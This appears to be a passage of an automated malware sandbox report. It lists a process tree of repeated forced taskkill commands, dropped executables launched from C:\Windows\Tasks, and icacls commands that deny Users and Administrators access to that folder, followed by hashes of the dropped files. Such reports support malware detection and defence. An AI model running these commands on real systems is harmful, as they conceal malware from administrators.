C:\Windows\system32\cmd.exe /c taskkill /f /im WerFault.exe
4⤵
PID:5480

C:\Windows\system32\taskkill.exe
taskkill /f /im WerFault.exe
5⤵
- Kills process with taskkill
PID:5492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v1.exe
4⤵
PID:5600

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v1.exe
5⤵
- Kills process with taskkill
PID:5612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v2.exe
4⤵
PID:5656

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v2.exe
5⤵
PID:5668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe
4⤵
PID:5720

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v3.exe
5⤵
PID:5732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v1.exe
4⤵
PID:5784

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v1.exe
5⤵
PID:5800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v2.exe
4⤵
PID:5852

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v2.exe
5⤵
PID:5868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v3.exe
4⤵
PID:5920

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v3.exe
5⤵
- Kills process with taskkill
PID:5936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im ape_modul_v1.exe
4⤵
PID:5976

C:\Windows\system32\taskkill.exe
taskkill /f /im ape_modul_v1.exe
5⤵
PID:5992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe
4⤵
PID:6044

C:\Windows\system32\taskkill.exe
taskkill /f /im full_rdp_modul_v1.exe
5⤵
- Kills process with taskkill
PID:6056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe
4⤵
PID:6096

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp.exe
5⤵
PID:6112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v4.exe
4⤵
PID:2768

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v4.exe
5⤵
PID:112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe
4⤵
PID:6184

C:\Windows\system32\taskkill.exe
taskkill /f /im nl.exe
5⤵
- Kills process with taskkill
PID:6204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im WerFault.exe
4⤵
PID:6256

C:\Windows\system32\taskkill.exe
taskkill /f /im WerFault.exe
5⤵
- Kills process with taskkill
PID:6272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v1.exe
4⤵
PID:6404

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v1.exe
5⤵
PID:6420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v2.exe
4⤵
PID:6472

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v2.exe
5⤵
- Kills process with taskkill
PID:6488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe
4⤵
PID:6536

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v3.exe
5⤵
PID:6552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v1.exe
4⤵
PID:6604

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v1.exe
5⤵
- Kills process with taskkill
PID:6620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v2.exe
4⤵
PID:6672

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v2.exe
5⤵
- Kills process with taskkill
PID:6684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v3.exe
4⤵
PID:6736

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v3.exe
5⤵
PID:6752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im ape_modul_v1.exe
4⤵
PID:6804

C:\Windows\system32\taskkill.exe
taskkill /f /im ape_modul_v1.exe
5⤵
PID:6816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe
4⤵
PID:6868

C:\Windows\system32\taskkill.exe
taskkill /f /im full_rdp_modul_v1.exe
5⤵
- Kills process with taskkill
PID:6884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe
4⤵
PID:6936

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp.exe
5⤵
PID:6928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v4.exe
4⤵
PID:6996

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v4.exe
5⤵
PID:7012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe
4⤵
PID:7052

C:\Windows\system32\taskkill.exe
taskkill /f /im nl.exe
5⤵
- Kills process with taskkill
PID:7076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im WerFault.exe
4⤵
PID:7104

C:\Windows\system32\taskkill.exe
taskkill /f /im WerFault.exe
5⤵
PID:7124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v1.exe
4⤵
PID:7220

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v1.exe
5⤵
- Kills process with taskkill
PID:7244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v2.exe
4⤵
PID:7296

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v2.exe
5⤵
- Kills process with taskkill
PID:372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe
4⤵
PID:2968

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v3.exe
5⤵
- Kills process with taskkill
PID:7304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v1.exe
4⤵
PID:7412

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v1.exe
5⤵
- Kills process with taskkill
PID:7420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v2.exe
4⤵
PID:7444

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v2.exe
5⤵
PID:7448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v3.exe
4⤵
PID:7468

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v3.exe
5⤵
PID:7504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im ape_modul_v1.exe
4⤵
PID:7544

C:\Windows\system32\taskkill.exe
taskkill /f /im ape_modul_v1.exe
5⤵
- Kills process with taskkill
PID:7560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe
4⤵
PID:7540

C:\Windows\system32\taskkill.exe
taskkill /f /im full_rdp_modul_v1.exe
5⤵
- Kills process with taskkill
PID:7556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe
4⤵
PID:7624

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp.exe
5⤵
- Kills process with taskkill
PID:7648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v4.exe
4⤵
PID:7680

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v4.exe
5⤵
PID:7688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe
4⤵
PID:7724

C:\Windows\system32\taskkill.exe
taskkill /f /im nl.exe
5⤵
PID:7732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im WerFault.exe
4⤵
PID:7768

C:\Windows\system32\taskkill.exe
taskkill /f /im WerFault.exe
5⤵
PID:7744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v1.exe
4⤵
PID:7820

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v1.exe
5⤵
- Kills process with taskkill
PID:7800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v2.exe
4⤵
PID:7772

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v2.exe
5⤵
PID:7828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe
4⤵
PID:7968

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v3.exe
5⤵
- Kills process with taskkill
PID:7996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v1.exe
4⤵
PID:8036

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v1.exe
5⤵
PID:8060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v2.exe
4⤵
PID:8084

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v2.exe
5⤵
PID:8092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v3.exe
4⤵
PID:8128

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v3.exe
5⤵
- Kills process with taskkill
PID:8136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im ape_modul_v1.exe
4⤵
PID:8168

C:\Windows\system32\taskkill.exe
taskkill /f /im ape_modul_v1.exe
5⤵
PID:1240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe
4⤵
PID:2812

C:\Windows\system32\taskkill.exe
taskkill /f /im full_rdp_modul_v1.exe
5⤵
PID:8028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe
4⤵
PID:7916

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp.exe
5⤵
- Kills process with taskkill
PID:7912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v4.exe
4⤵
PID:7788

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v4.exe
5⤵
- Kills process with taskkill
PID:7736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe
4⤵
PID:2896

C:\Windows\system32\taskkill.exe
taskkill /f /im nl.exe
5⤵
- Kills process with taskkill
PID:2980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im WerFault.exe
4⤵
PID:1656

C:\Windows\system32\taskkill.exe
taskkill /f /im WerFault.exe
5⤵
- Kills process with taskkill
PID:2172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v1.exe
4⤵
PID:1092

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v1.exe
5⤵
PID:1688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v2.exe
4⤵
PID:1288

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v2.exe
5⤵
- Kills process with taskkill
PID:2944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe
4⤵
PID:2236

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp_modul_v3.exe
5⤵
PID:812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v1.exe
4⤵
PID:1552

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v1.exe
5⤵
- Kills process with taskkill
PID:2700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v2.exe
4⤵
PID:3040

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v2.exe
5⤵
PID:2408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v3.exe
4⤵
PID:2760

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v3.exe
5⤵
PID:2312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im ape_modul_v1.exe
4⤵
PID:2648

C:\Windows\system32\taskkill.exe
taskkill /f /im ape_modul_v1.exe
5⤵
- Kills process with taskkill
PID:2744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe
4⤵
PID:2568

C:\Windows\system32\taskkill.exe
taskkill /f /im full_rdp_modul_v1.exe
5⤵
PID:2660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe
4⤵
PID:3172

C:\Windows\system32\taskkill.exe
taskkill /f /im rdp.exe
5⤵
PID:3156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v4.exe
4⤵
PID:3324

C:\Windows\system32\taskkill.exe
taskkill /f /im wrm_modul_v4.exe
5⤵
- Kills process with taskkill
PID:7632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe
4⤵
PID:3520

C:\Windows\system32\taskkill.exe
taskkill /f /im nl.exe
5⤵
PID:3592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im WerFault.exe
4⤵
PID:7520

C:\Windows\system32\taskkill.exe
taskkill /f /im WerFault.exe
5⤵
PID:7340

C:\windows\tasks\Wmiic.exe
C:\windows\tasks\Wmiic.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1984

C:\windows\tasks\IntelConfigService.exe
"IntelConfigService.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:264

C:\Windows\Tasks\Wrap.exe
C:\Windows\Tasks\Wrap.exe
3⤵
- Executes dropped EXE
PID:660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\Tasks\ApplicationsFrameHost.exe" --daemonized
4⤵
- Loads dropped DLL
PID:3252

C:\Windows\Tasks\ApplicationsFrameHost.exe
C:\Windows\Tasks\ApplicationsFrameHost.exe --daemonized
5⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "%username%:(R,REA,RA,RD)"
3⤵
PID:1404

C:\Windows\system32\icacls.exe
icacls C:\Windows\Tasks /deny "TICCAUTD$:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
3⤵
PID:564

C:\Windows\system32\icacls.exe
icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
3⤵
PID:808

C:\Windows\system32\icacls.exe
icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3192

C:\Windows\Tasks\Superfetch.exe
C:\Windows\Tasks\Superfetch.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2628

C:\Windows\Tasks\MSTask.exe
C:\Windows\Tasks\MSTask.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2620

C:\Windows\Tasks\MSTask.exe
C:\Windows\Tasks\MSTask.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1428

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\MicrosoftSystem\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
C:\ProgramData\MicrosoftSystem\run.bat
Filesize
283B

MD5
b0233b26f99cd79a1540575c529b064f

SHA1
0fb1a6e82ec6671a92563d48b5384bc82a93a6f2

SHA256
121d3896a1dc59201ca4960728d4ca0bdd96e355cc0f5d1af5c217e8ed3b37ea

SHA512
3d7bda92879824f1e97b590cc8f2024d7dded9d614cb901840b367317f936cda12eb883b5c8d9579202986ca4e4359cec5b855ff901d11d7107f2063709e7077

Download Submit
C:\ProgramData\migrate.exe
Filesize
44.6MB

MD5
e75a9f4cbcdd27b2537920d6fd9bd551

SHA1
cef1e0f896fc58679bdfb87ba11dc69a1e4948e6

SHA256
c180ab1760e2da0a10de0672901f86d3a0e690b37bfb17f1d7eeaced8faa145d

SHA512
7915bef2c04c865a3f3fc24f49472d27c7be11894ff86a277b8acaabe2f283f9981bf9bb4959e67c0f7fcfd244b47ec2cf56810f0d1d2f68de995fa5abf32337

Download Submit
C:\ProgramData\ru.bat
Filesize
32B

MD5
11e08b5abf3f1675f99c96f78c128b23

SHA1
40d6dd08262ef959328aec4dc5ed07532232037c

SHA256
50ac09332ff9d6521244b4f9cf6fd9cc489b3324ed1316e07f6a5904230397e7

SHA512
3005767016b4c5da031fb2ac5288b01821d54768b5e099e1157d4fa4621a078d589e54d9c5c89ded58ac3ca94395dacbf1d840f9210f909d3c9dfe8092de8ff9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
6cdc12e58ea309cea6d2670428ed06b4

SHA1
6ddd13297627c849481d56793ec1a7c9def7a197

SHA256
6c4b028b4d6ba7c4d58ad08247b8f6643f7ec4671056eb41a2d294bfbba7addc

SHA512
2acd34d488f15765e2db58665ae08b2853dbfde90346ab3a654479c5401771b62b753c4a956c370f2a1ea5f13a713b6f007f867647f4df23232bd3910605eea6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
c5d1febe4e9c69eb3f354f39602069bb

SHA1
2458156e09be5ba5a98bd0939d781c4535d056c4

SHA256
dac3ddb6056938d59ae8947161050fa15ce28e94929c973289e156468e8b5f73

SHA512
0fc8f18eb0b905599b07512f5b637ec2c98be993e4f9ae34f12bd85191347fde77eb9a2330fcfa0ba9506d7e8f6ad9c506c31e353964999e49342ece3bf75933

Download Submit
C:\Users\mig.exe
Filesize
45.0MB

MD5
a2059ca7715450dc171f7608325744da

SHA1
59f73376071e1e81471e8452db1c188340885a2f

SHA256
72ef598f8e69e142e21fef23cff48d2e9e49dcd142c12189656eab3269b454eb

SHA512
8c2ab1eb0e74a35883f35031c80c98ac63301b21350978d3d322aaf1fc9f02fa7f96cf1f824818f04a821c7f50029a8b9d7b423cf488fd9121dfa00cc0f2562b

Download Submit
C:\Windows\TEMP\_MEI80082\VCRUNTIME140.dll
Filesize
87KB

MD5
0e675d4a7a5b7ccd69013386793f68eb

SHA1
6e5821ddd8fea6681bda4448816f39984a33596b

SHA256
bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1

SHA512
cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66

Download Submit
C:\Windows\TEMP\_MEI80082\_bz2.pyd
Filesize
82KB

MD5
3dc8af67e6ee06af9eec52fe985a7633

SHA1
1451b8c598348a0c0e50afc0ec91513c46fe3af6

SHA256
c55821f5fdb0064c796b2c0b03b51971f073140bc210cbe6ed90387db2bed929

SHA512
da16bfbc66c8abc078278d4d3ce1595a54c9ef43ae8837ceb35ae2f4757b930fe55e258827036eba8218315c10af5928e30cb22c60ff69159c8fe76327280087

Download Submit
C:\Windows\TEMP\_MEI80082\_ctypes.pyd
Filesize
120KB

MD5
f1e33a8f6f91c2ed93dc5049dd50d7b8

SHA1
23c583dc98aa3f6b8b108db5d90e65d3dd72e9b4

SHA256
9459d246df7a3c638776305cf3683946ba8db26a7de90df8b60e1be0b27e53c4

SHA512
229896da389d78cbdf2168753ed7fcc72d8e0e62c6607a3766d6d47842c0abd519ac4f5d46607b15e7ba785280f9d27b482954e931645337a152b8a54467c6a5

Download Submit
C:\Windows\TEMP\_MEI80082\_hashlib.pyd
Filesize
44KB

MD5
a6448bc5e5da21a222de164823add45c

SHA1
6c26eb949d7eb97d19e42559b2e3713d7629f2f9

SHA256
3692fc8e70e6e29910032240080fc8109248ce9a996f0a70d69acf1542fca69a

SHA512
a3833c7e1cf0e4d181ac4de95c5dfa685cf528dc39010bf0ac82864953106213eccff70785021ccb05395b5cf0dcb89404394327cd7e69f820d14dfa6fba8cba

Download Submit
C:\Windows\TEMP\_MEI80082\_lzma.pyd
Filesize
246KB

MD5
37057c92f50391d0751f2c1d7ad25b02

SHA1
a43c6835b11621663fa251da421be58d143d2afb

SHA256
9442dc46829485670a6ac0c02ef83c54b401f1570d1d5d1d85c19c1587487764

SHA512
953dc856ad00c3aec6aeab3afa2deb24211b5b791c184598a2573b444761db2d4d770b8b807ebba00ee18725ff83157ec5fa2e3591a7756eb718eba282491c7c

Download Submit
C:\Windows\TEMP\_MEI80082\_socket.pyd
Filesize
77KB

MD5
d6bae4b430f349ab42553dc738699f0e

SHA1
7e5efc958e189c117eccef39ec16ebf00e7645a9

SHA256
587c4f3092b5f3e34f6b1e927ecc7127b3fe2f7fa84e8a3d0c41828583bd5cef

SHA512
a8f8fed5ea88e8177e291b708e44b763d105907e9f8c9e046c4eebb8684a1778383d1fba6a5fa863ca37c42fd58ed977e9bb3a6b12c5b8d9ab6ef44de75e3d1e

Download Submit
C:\Windows\TEMP\_MEI80082\_ssl.pyd
Filesize
115KB

MD5
8ee827f2fe931163f078acdc97107b64

SHA1
149bb536f3492bc59bd7071a3da7d1f974860641

SHA256
eaeefa6722c45e486f48a67ba18b4abb3ff0c29e5b30c23445c29a4d0b1cd3e4

SHA512
a6d24e72bf620ef695f08f5ffde70ef93f42a3fa60f7c76eb0f521393c595717e05ccb7a61ae216c18fe41e95fb238d82637714cf5208ee8f1dd32ae405b5565

Download Submit
C:\Windows\TEMP\_MEI80082\base_library.zip
Filesize
821KB

MD5
614436c7ea1ef4a93edf3e388ca9dd65

SHA1
68191fb975e9236dd9a9c5f856a5eb05e54fc082

SHA256
e728ec7da471e7962c52bf86046f42863787f4564a08ee6666ed0c70e1a715c1

SHA512
f16437004378aecb9bd8ed81062d7ae17340ea483cdcd6259ad3279bebd512aa2d92b012f85afb74f34b4ecc1b45a6ce6f7fc2aa28f88d9a470ba33e50651b63

Download Submit
C:\Windows\TEMP\_MEI80082\libcrypto-1_1.dll
Filesize
3.2MB

MD5
bf83f8ad60cb9db462ce62c73208a30d

SHA1
f1bc7dbc1e5b00426a51878719196d78981674c4

SHA256
012866b68f458ec204b9bce067af8f4a488860774e7e17973c49e583b52b828d

SHA512
ae1bdda1c174ddf4205ab19a25737fe523dca6a9a339030cd8a95674c243d0011121067c007be56def4eaeffc40cbdadfdcbd1e61df3404d6a3921d196dcd81e

Download Submit
C:\Windows\TEMP\_MEI80082\libffi-7.dll
Filesize
32KB

MD5
4424baf6ed5340df85482fa82b857b03

SHA1
181b641bf21c810a486f855864cd4b8967c24c44

SHA256
8c1f7f64579d01fedfde07e0906b1f8e607c34d5e6424c87abe431a2322eba79

SHA512
8adb94893ada555de2e82f006ab4d571fad8a1b16ac19ca4d2efc1065677f25d2de5c981473fabd0398f6328c1be1ebd4d36668ea67f8a5d25060f1980ee7e33

Download Submit
C:\Windows\TEMP\_MEI80082\libssl-1_1.dll
Filesize
670KB

MD5
fe1f3632af98e7b7a2799e3973ba03cf

SHA1
353c7382e2de3ccdd2a4911e9e158e7c78648496

SHA256
1ce7ba99e817c1c2d71bc88a1bdd6fcad82aa5c3e519b91ebd56c96f22e3543b

SHA512
a0123dfe324d3ebf68a44afafca7c6f33d918716f29b063c72c4a8bd2006b81faea6848f4f2423778d57296d7bf4f99a3638fc87b37520f0dcbeefa3a2343de0

Download Submit
C:\Windows\TEMP\_MEI80082\python38.dll
Filesize
4.0MB

MD5
d2a8a5e7380d5f4716016777818a32c5

SHA1
fb12f31d1d0758fe3e056875461186056121ed0c

SHA256
59ab345c565304f638effa7c0236f26041fd06e35041a75988e13995cd28ace9

SHA512
ad1269d1367f587809e3fbe44af703c464a88fa3b2ae0bf2ad6544b8ed938e4265aab7e308d999e6c8297c0c85c608e3160796325286db3188a3edf040a02ab7

Download Submit
C:\Windows\TEMP\_MEI80082\select.pyd
Filesize
26KB

MD5
6ae54d103866aad6f58e119d27552131

SHA1
bc53a92a7667fd922ce29e98dfcf5f08f798a3d2

SHA256
63b81af5d3576473c17ac929bea0add5bf8d7ea95c946caf66cbb9ad3f233a88

SHA512
ff23f3196a10892ea22b28ae929330c8b08ab64909937609b7af7bfb1623cd2f02a041fd9fab24e4bc1754276bdafd02d832c2f642c8ecdcb233f639bdf66dd0

Download Submit
C:\Windows\TEMP\_MEI80082\unicodedata.pyd
Filesize
1.0MB

MD5
4c0d43f1a31e76255cb592bb616683e7

SHA1
0a9f3d77a6e064baebacacc780701117f09169ad

SHA256
0f84e9f0d0bf44d10527a9816fcab495e3d797b09e7bbd1e6bd666ceb4b6c1a8

SHA512
b8176a180a441fe402e86f055aa5503356e7f49e984d70ab1060dee4f5f17fcec9c01f75bbff75ce5f4ef212677a6525804be53646cc0d7817b6ed5fd83fd778

Download Submit
C:\Windows\Tasks\run.bat
Filesize
566B

MD5
ec04f50bc9bccb2484db435653f949e7

SHA1
9a898ab38e980caa44504ebb400ee01ce2d46a3f

SHA256
806a3fedd93ad066f918e6edda5a464fd4c13390501bba9bef8c7e2f0d6b8ba4

SHA512
c6e98899eb2d2fdae8e67c0f63de4c9a3bd956343909f07063f128fb6ff488855045f4e7feb3ade6d5e76eb1a59d0f22e4213457717a70616a41bfc5544583da

Download Submit
\??\c:\programdata\1.exe
Filesize
297KB

MD5
809bd9b203cf2ea6fe29d7074ae1c246

SHA1
1efd4ba7ac8c7317f4d01e409a580dc02ced6306

SHA256
663bc369d3051824e2b2f9e05accb8e9e4be86afc59d5b2aa26a3a5ee150370a

SHA512
6bc93e02e192ab03c448bf7a982fc5af0a1a5df5e2bd9cacdebb9279119845f43ddc68011194c7317021f75ad37ba7c1603c77af09bdfe2febfbaca0fffe8249

Download Submit
\??\c:\programdata\st.bat
Filesize
1KB

MD5
4050181042859e45ecfa6f224afa79df

SHA1
e72c9c8ba589b42a82792d8f7e794b79d8e831e3

SHA256
9df0ff284989b10162cffb51d9873c6743ffb83f6d7c4b869a8193e6d6ac63e9

SHA512
de2740437a431403ac89577f1f570a78269f0f24c58b531e7522542e60a668d7da355be3a126ac2fc4472282c0b06d8b217ec62f04ed5e6aab0ba9c8d27c54ce

Download Submit
\ProgramData\MicrosoftSystem\svchosl.exe
Filesize
5.2MB

MD5
9f478308a636906db8c36e77ce68b4c2

SHA1
369b818537e16c4c038ce0779bb031ba6980db9c

SHA256
544095b7f34939172ea5bd6544be4c82357921f3153d17ac0e4b1b93dc363de4

SHA512
4f7f165b5871cb1aab078256cfffc63758cc22729fdce66c84ef6ebe2c6015cfe644040676905d5e8b5396cdaec5cf591394618b7abe77b2e2b06df36b4ff627

Download Submit
\Users\123.exe
Filesize
5.4MB

MD5
4a24aad5274be7e1fd5e3ef95ea20f8f

SHA1
5cf6788734ab460430e01d32f3e64a47ae808122

SHA256
0c1b74e40ed0d866a7532724e73594994f37a5046067997267c4a5a259f24da8

SHA512
0bd9fc5ef25271cd446eaa75331b6b202137e77793385e203c6d1955dbf309bb91bd1c4922c2be2456619e5ba0369530c86f9045fec0bd72070f77841f2a1df0

Download Submit
memory/2384-45-0x0000000006C20000-0x0000000006C88000-memory.dmp

Filesize
416KB

Download
memory/2384-37-0x0000000006C20000-0x0000000006C88000-memory.dmp

Filesize
416KB

Download
memory/2384-4-0x0000000006C20000-0x0000000006C88000-memory.dmp

Filesize
416KB

Download
memory/2384-39-0x0000000006C20000-0x0000000006C88000-memory.dmp

Filesize
416KB

Download
memory/2384-59-0x0000000006C20000-0x0000000006C88000-memory.dmp

Filesize
416KB

Download
